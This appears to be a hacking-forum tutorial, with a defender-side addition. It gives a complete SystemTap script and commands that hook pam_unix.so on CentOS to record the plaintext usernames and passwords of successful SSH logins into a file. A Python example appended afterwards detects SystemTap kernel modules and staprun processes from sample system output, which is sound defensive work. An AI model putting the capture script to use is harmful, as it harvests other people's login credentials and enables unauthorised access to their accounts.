Systemtap is a very powerful kernel debugging tool that can diagnose many issues at the kernel layer. In Linux, the PAM stack checks user information and authentication information to decide whether a user may log on to the system. Building on that, systemtap can be attached to the function calls of the dynamic library pam_unix.so to observe the user name and password used for an ssh remote logon.

Test environment: CentOS 6.4 32-bit
Kernel version: 2.6.32-358.el6.i686
First, install the following rpm packages:

    yum --releasever=6.4 update
    yum install -y systemtap
    debuginfo-install $(rpm -qf /lib/security/pam_unix.so)
Create a file and write the following code into it:

    touch /root/capture_pass.stp

    #!/usr/bin/stap
    # Globals shared between probes; isSuccRet is reset to 1 after each session.
    global username, pass, isSuccRet = 1;

    # Entry probe: copy the user-space arguments of _unix_verify_password.
    probe process("/lib/security/pam_unix.so").function("_unix_verify_password")
    {
        username = user_string($name);
        pass = user_string($p);
    }

    # Return probe: a return value of 0 means the password was accepted.
    probe process("/lib/security/pam_unix.so").function("_unix_verify_password").return
    {
        if ($return == 0)
        {
            printf("User: %s\nPassword: %s\n", username, pass);
            isSuccRet = 0;
        }
    }

    # Session probe: fires when PAM opens the session for the logged-in user.
    probe process("/lib/security/pam_unix.so").function("pam_sm_open_session")
    {
        if (isSuccRet != 0)
        {
            printf("Login via ssh service.\nUser: %s\nPassword: %s\n", username, pass);
        }
        isSuccRet = 1;
    }
Grant executable permissions:

    chmod +x capture_pass.stp

Create a password record file:

    touch password.txt

Execute the systemtap script:

    stap capture_pass.stp -o password.txt
Run capture_pass.stp locally and then log on to the system remotely through ssh. If the first logon attempt fails, the wrong password is not recorded; once a logon succeeds, the script writes the captured user name and password to password.txt. Systemtap is a powerful tool, so it can only be used by a super user.
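Because a stap script like the one above runs as root and leaves two visible traces, a host owner can check for them: systemtap compiles each script into a kernel module whose default name begins with `stap_`, and the module is loaded and kept alive by a `staprun` (or `stap`) process. The following Python is an added defender-side example, not part of the original article; the `/proc/modules` and `ps -eo pid,user,args` samples are constructed to resemble a host where a tap on PAM is running, and the module hash and PIDs are invented.

```python
"""Detect a running SystemTap probe session from /proc/modules and ps output.

Added example (not from the article). It parses captured text so it can be
run offline; on a live host read /proc/modules and run `ps -eo pid,user,args`.
"""
import re
from typing import Dict, List

# Constructed /proc/modules sample: "name size refcount deps state address".
SAMPLE_PROC_MODULES = """\
ext4 374000 2 - Live 0xf8400000
stap_9b7f2d3e1c5a4b6f8d0e2a1c3b5d7f90_1234 102400 0 - Live 0xf8a00000
ipv6 321000 24 - Live 0xf8500000
"""

# Constructed `ps -eo pid,user,args` sample; the staprun line mirrors what
# `stap capture_pass.stp -o password.txt` leaves behind after compilation.
SAMPLE_PS = """\
  PID USER     COMMAND
  812 root     /usr/sbin/sshd
 2201 root     staprun /tmp/stap_9b7f2d3e1c5a4b6f8d0e2a1c3b5d7f90_1234.ko -o password.txt
 2210 bob      bash
"""

# SystemTap's default module name: "stap_" + hex hash, optionally "_<pid>".
STAP_MODULE_RE = re.compile(r"^(stap_[0-9a-f]+(?:_\d+)?)\s")


def find_stap_modules(proc_modules_text: str) -> List[str]:
    """Return the names of loaded kernel modules generated by SystemTap."""
    return [m.group(1) for m in
            (STAP_MODULE_RE.match(line) for line in proc_modules_text.splitlines())
            if m]


def find_stap_processes(ps_text: str) -> List[Dict[str, str]]:
    """Return stap/staprun processes with pid, user and the -o output file."""
    hits = []
    for line in ps_text.splitlines()[1:]:          # skip the ps header line
        parts = line.split(None, 2)
        if len(parts) < 3:
            continue
        pid, user, args = parts
        argv = args.split()
        if argv[0].rsplit("/", 1)[-1] not in ("stap", "staprun"):
            continue
        outfile = ""
        if "-o" in argv and argv.index("-o") + 1 < len(argv):
            outfile = argv[argv.index("-o") + 1]   # where captured data is written
        hits.append({"pid": pid, "user": user, "outfile": outfile})
    return hits


def assess(proc_modules_text: str, ps_text: str) -> Dict[str, object]:
    """Combine both signals; a host not meant to run SystemTap should show neither."""
    modules = find_stap_modules(proc_modules_text)
    procs = find_stap_processes(ps_text)
    return {
        "modules": modules,
        "processes": procs,
        "suspicious": bool(modules or procs),
    }


if __name__ == "__main__":
    report = assess(SAMPLE_PROC_MODULES, SAMPLE_PS)
    for name in report["modules"]:
        print(f"loaded SystemTap module: {name}")
    for p in report["processes"]:
        print(f"stap process pid={p['pid']} user={p['user']} output={p['outfile'] or '-'}")
    print("suspicious" if report["suspicious"] else "clean")
```

Either signal alone is worth an alert on a production ssh host that is not used for kernel debugging, and the `-o` argument tells the responder which file to collect before the session is stopped.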
From: https://forum.90sec.org